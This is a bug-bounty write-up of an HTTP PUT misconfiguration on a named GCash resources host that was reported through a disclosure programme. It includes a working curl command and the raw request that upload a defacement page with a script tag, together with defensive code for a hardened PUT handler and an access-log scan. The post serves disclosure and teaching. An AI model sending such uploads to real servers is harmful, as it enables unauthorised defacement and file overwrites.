Howdy Readers,
During my random testing for my personal project toolkit for web application assessment, I found a very simple and very interesting vulnerability that allowed me to easily pwn my target due to an HTTP method misconfiguration. The target has an HTTP PUT method-enabled vulnerability, and it was detected by a Nuclei scan, since one of the tools in my project toolkit is Nuclei from ProjectDiscovery.
What is the "HTTP PUT method enabled" vulnerability?
The HTTP PUT method allows clients to upload data to the server; it is normally used for creating or replacing resources. If this method is enabled on a server or web application without proper restrictions or authentication, it becomes a significant security vulnerability: unauthorized users can upload malicious files, overwrite existing files (including the site's own pages), or cause other forms of disruption.
So, long story short: during my testing, I was able to upload a test HTML file and a text file as a PoC, and it also allowed me to overwrite the index file of the vulnerable target (easy deface).
Vulnerability Report:
Globe Telecom - wPT (Bug Bounty)
Title:
HTTP PUT Method enabled
Severity:
High
Category:
Code Injection
Affected:
https://resources.gcash.com/
Description:
The HTTP PUT method allows clients to upload data to the server; it is normally used for creating or replacing resources. If this method is enabled on a server or web application without proper restrictions or authentication, it becomes a significant security vulnerability: unauthorized users can upload malicious files, overwrite existing files, or cause other forms of disruption.
Recommendations:
• The best practice is to disable the HTTP PUT method entirely unless explicitly needed for specific use cases, especially on publicly accessible servers.
• If the PUT method must be enabled, ensure that it is restricted to authenticated and authorized users only.
• If file uploads are required via the PUT method, ensure that proper input validation is in place.
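As an added example (not part of the original report or of the affected site's code), here is a minimal WSGI PUT handler that applies the three recommendations in one place: PUT is refused with 405 unless it is explicitly switched on, an enabled PUT requires HTTP Basic credentials, and the target path is normalised, confined to an upload directory and checked against an extension allow-list before anything is written. The credential store, upload root, size limit and allowed extensions are assumed values for the demonstration.

```python
"""Added example: policy for an HTTP PUT endpoint following the recommendations.
This is illustration code, not the affected site's or any project's code."""
import base64
import hmac
import io
import posixpath

ALLOW_PUT = False                          # recommendation 1: off unless needed
UPLOAD_ROOT = "/srv/uploads"               # assumed upload directory
ALLOWED_EXT = {".txt", ".json", ".csv"}    # recommendation 3: no .html/.php/...
MAX_BODY = 1_000_000                       # assumed 1 MB cap per upload
# Assumed credential store; a real deployment would keep hashed passwords.
USERS = {"uploader": "correct-horse-battery-staple"}


def authenticate(environ) -> bool:
    """Recommendation 2: HTTP Basic auth, password compared in constant time."""
    header = environ.get("HTTP_AUTHORIZATION", "")
    if not header.startswith("Basic "):
        return False
    try:
        user, _, pwd = base64.b64decode(header[6:]).decode().partition(":")
    except ValueError:          # bad base64 or non-UTF-8 bytes
        return False
    expected = USERS.get(user)
    return expected is not None and hmac.compare_digest(pwd.encode(), expected.encode())


def safe_target(path_info: str):
    """Recommendation 3: normalise the path, confine it to UPLOAD_ROOT and
    allow only harmless extensions. Returns the filesystem path or None."""
    norm = posixpath.normpath("/" + path_info.lstrip("/"))   # collapses any ".."
    if norm == "/":
        return None
    if posixpath.splitext(norm)[1].lower() not in ALLOWED_EXT:
        return None
    full = posixpath.join(UPLOAD_ROOT, norm[1:])
    if not full.startswith(UPLOAD_ROOT + "/"):               # belt and braces
        return None
    return full


def handle_put(environ, allow_put=ALLOW_PUT, write=lambda path, data: None):
    """Handle a PUT request; returns (status, headers, body).
    `write` is injected so the example runs without touching the disk."""
    if not allow_put:
        return "405 Method Not Allowed", [("Allow", "GET, HEAD")], b""
    if not authenticate(environ):
        return "401 Unauthorized", [("WWW-Authenticate", 'Basic realm="uploads"')], b""
    target = safe_target(environ.get("PATH_INFO", ""))
    if target is None:
        return "403 Forbidden", [], b"rejected path or file type"
    try:
        length = int(environ.get("CONTENT_LENGTH") or 0)
    except ValueError:
        return "400 Bad Request", [], b""
    if length > MAX_BODY:
        return "413 Payload Too Large", [], b""
    body = environ["wsgi.input"].read(length)
    write(target, body)
    return "201 Created", [("Location", environ.get("PATH_INFO", ""))], b""


def make_environ(method, path, body=b"", auth=None):
    """Build a minimal WSGI environ (constructed test input, not a live request)."""
    env = {"REQUEST_METHOD": method, "PATH_INFO": path,
           "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body)}
    if auth:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        env["HTTP_AUTHORIZATION"] = "Basic " + token
    return env


if __name__ == "__main__":
    # Replay the shape of the request from the report against the policy.
    page = b"<h1>\r\npwned by evan (@evanricafort)\r\n</h1>"
    print(handle_put(make_environ("PUT", "/test-evan.html", page))[0])   # 405 by default
    print(handle_put(make_environ("PUT", "/test-evan.html", page), allow_put=True)[0])  # 401
    good = make_environ("PUT", "/test-evan.html", page, auth=("uploader", USERS["uploader"]))
    print(handle_put(good, allow_put=True)[0])                           # 403: .html not allowed
```

Even with PUT switched on and valid credentials, the deface payload from the report is stopped at the extension check, and a traversal attempt such as `/../../etc/passwd.txt` is folded back under the upload root rather than escaping it.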
Evidence:
It was found that the affected target has an HTTP PUT method enabled vulnerability. It allows an attacker to modify or replace important files, which could lead to loss of data integrity, tampered configurations, or broken applications.
Steps to Reproduce:
1. Execute the following command:
curl --path-as-is -i -s -k -X $'PUT' \
  -H $'Host: resources.gcash.com' \
  -H $'Content-Type: text/html' \
  --data-binary $'\x0d\x0a<h1>\x0d\x0apwned by evan (@evanricafort)\x0d\x0a</h1>\x0d\x0a<script>alert(\"pwned!\")</script>' \
  $'https://resources.gcash.com/test-evan.html'
2. Go to your uploaded file.
3. Check and verify the vulnerability.
Live Demo: https://resources.gcash.com/test-evan.html
Request:
PUT /test-evan.html HTTP/2
Host: resources.gcash.com
Content-Type: text/html
Content-Length: 78

<h1>
pwned by evan (@evanricafort)
</h1>
<script>alert("pwned!")</script>
Response:
HTTP/2 200 OK
Date: Sun, 12 Jan 2025 19:06:37 GMT
Content-Length: 0
Server: istio-envoy
Etag: "XXX"
Cache-Control: max-age=31536000
X-Envoy-Upstream-Service-Time: 45
X-Kong-Upstream-Latency: 44
X-Kong-Proxy-Latency: 1
Via: kong/3.0.1.0-enterprise-edition
X-Kong-Deployment: wc-v5-29-fe
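From the defender's side, the request/response pair above leaves a clear trace in the web server's access log: a write-capable method that the origin answered with a 2xx. The following added example (not part of the original report) scans Combined Log Format lines for exactly that pattern; the log lines are constructed samples using documentation IP ranges, and the log format is assumed to be the default nginx/Apache combined format.

```python
"""Added example: flag accepted write-method requests in access logs.
Illustration code, not from the original report. Log lines are constructed."""
import re
from collections import Counter

# Methods that create, replace or delete server-side resources.
WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Combined Log Format (assumed): ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log: the PUT/GET pair mirrors the report's PoC, plus noise.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2025:19:06:37 +0000] "PUT /test-evan.html HTTP/2.0" 200 0 "-" "curl/8.4.0"
203.0.113.7 - - [12/Jan/2025:19:06:41 +0000] "GET /test-evan.html HTTP/2.0" 200 78 "-" "curl/8.4.0"
198.51.100.2 - - [12/Jan/2025:19:07:02 +0000] "GET /index.html HTTP/2.0" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jan/2025:19:08:10 +0000] "PUT /index.html HTTP/2.0" 200 0 "-" "curl/8.4.0"
192.0.2.9 - - [12/Jan/2025:19:09:00 +0000] "PUT /probe.txt HTTP/1.1" 405 0 "-" "python-requests/2.31"
192.0.2.9 - - [12/Jan/2025:19:09:01 +0000] "OPTIONS / HTTP/1.1" 204 0 "-" "python-requests/2.31"
garbage line that does not parse
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_accepted_writes(log_text):
    """Return records where a write method received a 2xx response.
    A rejected PUT (405) is expected on a hardened server and is not reported."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] in WRITE_METHODS and rec["status"].startswith("2"):
            hits.append(rec)
    return hits


def summarize(hits):
    """Accepted writes per source address, suitable for an alert body."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = find_accepted_writes(SAMPLE_LOG)
    for rec in found:
        print(f"ALERT accepted {rec['method']} {rec['path']} from {rec['ip']} at {rec['time']}")
    print(summarize(found))
```

Run against real logs, the same function is a cheap retroactive check for whether anyone exercised PUT before the method was disabled; the `/index.html` hit is the overwrite case the report describes.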
The vulnerability was reported directly to Globe Telecom via their VDP, and they already fixed the issue without giving any feedback/response to the report.
Man... It's 2025, and I still can't believe I've been doing this thing (bug bounty). I hope you find this article interesting and useful.
Reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
"Never let the fear of striking out keep you from playing the game."
– Babe Ruth